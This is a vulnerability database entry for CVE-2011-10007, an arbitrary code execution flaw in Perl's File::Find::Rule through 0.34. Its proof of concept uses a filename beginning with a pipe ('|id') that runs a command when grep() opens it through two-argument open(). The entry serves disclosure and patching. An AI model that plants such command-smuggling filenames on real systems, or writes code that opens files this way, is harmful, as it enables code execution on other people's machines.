Executive Summary

Informations
Name CVE-2011-10007 First vendor Publication 2025-06-05
Vendor Cve Last vendor Modification 2025-06-06

Security-Database Scoring CVSS v3

Cvss vector : N/A
Overall CVSS Score NA
Base Score NA Environmental Score NA
impact SubScore NA Temporal Score NA
Exploitabality Sub Score NA
 
Calculate full CVSS 3.0 Vectors scores

Security-Database Scoring CVSS v2

Cvss vector :
Cvss Base Score N/A Attack Range N/A
Cvss Impact Score N/A Attack Complexity N/A
Cvss Expoit Score N/A Authentication N/A
Calculate full CVSS 2.0 Vectors scores

Detail

File::Find::Rule through 0.34 for Perl is vulnerable to Arbitrary Code Execution when `grep()` encounters a crafted filename.

A file handle is opened with the 2 argument form of `open()` allowing an attacker controlled filename to provide the MODE parameter to `open()`, turning the filename into a command to be executed.

Example:

$ mkdir /tmp/poc; echo > "/tmp/poc/|id" $ perl -MFile::Find::Rule \ Â Â -E 'File::Find::Rule->grep("foo")->in("/tmp/poc")' uid=1000(user) gid=1000(user) groups=1000(user),100(users)

Original Source

Url : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-10007

Sources (Detail)

http://www.openwall.com/lists/oss-security/2025/06/05/4
http://www.openwall.com/lists/oss-security/2025/06/06/1
http://www.openwall.com/lists/oss-security/2025/06/06/3
https://github.com/richardc/perl-file-find-rule/commit/df58128bcee4c1da78c34d...
https://github.com/richardc/perl-file-find-rule/pull/4
https://lists.debian.org/debian-lts-announce/2025/06/msg00006.html
https://metacpan.org/release/RCLAMP/File-Find-Rule-0.34/source/lib/File/Find/...
https://rt.cpan.org/Public/Bug/Display.html?id=64504
Source Url

Alert History

If you want to see full details history, please login or register.
0
1
2
3
Date Informations
2025-06-06 09:20:34
  • Multiple Updates
2025-06-06 00:20:32
  • Multiple Updates
2025-06-05 21:20:32
  • Multiple Updates
2025-06-05 17:20:31
  • First insertion